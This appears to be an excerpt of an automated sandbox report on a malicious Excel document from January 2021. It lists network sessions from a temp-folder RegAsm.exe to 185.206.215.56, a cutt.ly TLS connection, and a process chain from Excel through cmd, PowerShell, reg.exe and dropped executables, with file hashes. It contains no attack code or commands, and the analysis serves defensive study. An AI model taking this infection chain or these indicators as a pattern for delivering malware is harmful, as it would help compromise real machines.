Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
98 | 192.168.2.22 | 49265 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
99 | 192.168.2.22 | 49266 | 185.206.215.56 | 80 | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Timestamp | kBytes transferred | Direction | Data |
---|
HTTPS Packets |
---|
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
---|---|---|---|---|---|---|---|---|---|---|
Jan 5, 2021 19:05:20.849750996 CET | 104.22.0.232 | 443 | 192.168.2.22 | 49165 | CN=www.cutt.ly CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US | CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US | Sat Feb 08 01:00:00 CET 2020 Thu Nov 02 13:24:33 CET 2017 | Thu Apr 08 14:00:00 CEST 2021 Tue Nov 02 13:24:33 CET 2027 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0 | 05af1f5ca1b87cc9cc9b25185115607d |
CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US | CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US | Thu Nov 02 13:24:33 CET 2017 | Tue Nov 02 13:24:33 CET 2027 |
Code Manipulations |
---|
Statistics |
---|
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 19:04:38 |
Start date: | 05/01/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f7f0000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 19:04:40 |
Start date: | 05/01/2021 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x4aa20000 |
File size: | 345088 bytes |
MD5 hash: | 5746BD7E255DD6A8AFA06F7C42C1BA41 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 19:04:40 |
Start date: | 05/01/2021 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x4aa20000 |
File size: | 345088 bytes |
MD5 hash: | 5746BD7E255DD6A8AFA06F7C42C1BA41 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 19:04:40 |
Start date: | 05/01/2021 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x4aa20000 |
File size: | 345088 bytes |
MD5 hash: | 5746BD7E255DD6A8AFA06F7C42C1BA41 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
General |
---|
Start time: | 19:04:41 |
Start date: | 05/01/2021 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13fe30000 |
File size: | 473600 bytes |
MD5 hash: | 852D67A27E454BD389FA7F02A8CBE23F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Reputation: | high |
General |
---|
Start time: | 19:04:41 |
Start date: | 05/01/2021 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13fe30000 |
File size: | 473600 bytes |
MD5 hash: | 852D67A27E454BD389FA7F02A8CBE23F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Reputation: | high |
General |
---|
Start time: | 19:04:41 |
Start date: | 05/01/2021 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13fe30000 |
File size: | 473600 bytes |
MD5 hash: | 852D67A27E454BD389FA7F02A8CBE23F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Reputation: | high |
General |
---|
Start time: | 19:05:08 |
Start date: | 05/01/2021 |
Path: | C:\Users\user\AppData\Local\Temp\12.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x12a0000 |
File size: | 938440 bytes |
MD5 hash: | 1D11ABB9DAC9B15823D1BCAD2B8B3675 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Yara matches: |
|
Reputation: | low |
General |
---|
Start time: | 19:05:11 |
Start date: | 05/01/2021 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x4a4c0000 |
File size: | 302592 bytes |
MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 19:05:11 |
Start date: | 05/01/2021 |
Path: | C:\Windows\SysWOW64\reg.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x8f0000 |
File size: | 62464 bytes |
MD5 hash: | D69A9ABBB0D795F21995C2F48C1EB560 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 19:05:22 |
Start date: | 05/01/2021 |
Path: | C:\Users\user\ntrwe.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xe90000 |
File size: | 938440 bytes |
MD5 hash: | 1D11ABB9DAC9B15823D1BCAD2B8B3675 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Yara matches: |
|
Antivirus matches: |
|
Reputation: | low |
General |
---|
Start time: | 19:05:23 |
Start date: | 05/01/2021 |
Path: | C:\Users\user\ntrwe.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xe90000 |
File size: | 938440 bytes |
MD5 hash: | 1D11ABB9DAC9B15823D1BCAD2B8B3675 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Reputation: | low |
General |
---|
Start time: | 19:05:24 |
Start date: | 05/01/2021 |
Path: | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x250000 |
File size: | 64672 bytes |
MD5 hash: | ADF76F395D5A0ECBBF005390B73C3FD2 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Antivirus matches: |
|
Reputation: | moderate |
General |
---|
Start time: | 19:05:31 |
Start date: | 05/01/2021 |
Path: | C:\Users\user\ntrwe.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xe90000 |
File size: | 938440 bytes |
MD5 hash: | 1D11ABB9DAC9B15823D1BCAD2B8B3675 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Yara matches: |
|
Reputation: | low |
General |
---|
Start time: | 19:05:33 |
Start date: | 05/01/2021 |
Path: | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1230000 |
File size: | 64672 bytes |
MD5 hash: | ADF76F395D5A0ECBBF005390B73C3FD2 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | moderate |
Disassembly |
---|
Code Analysis |
---|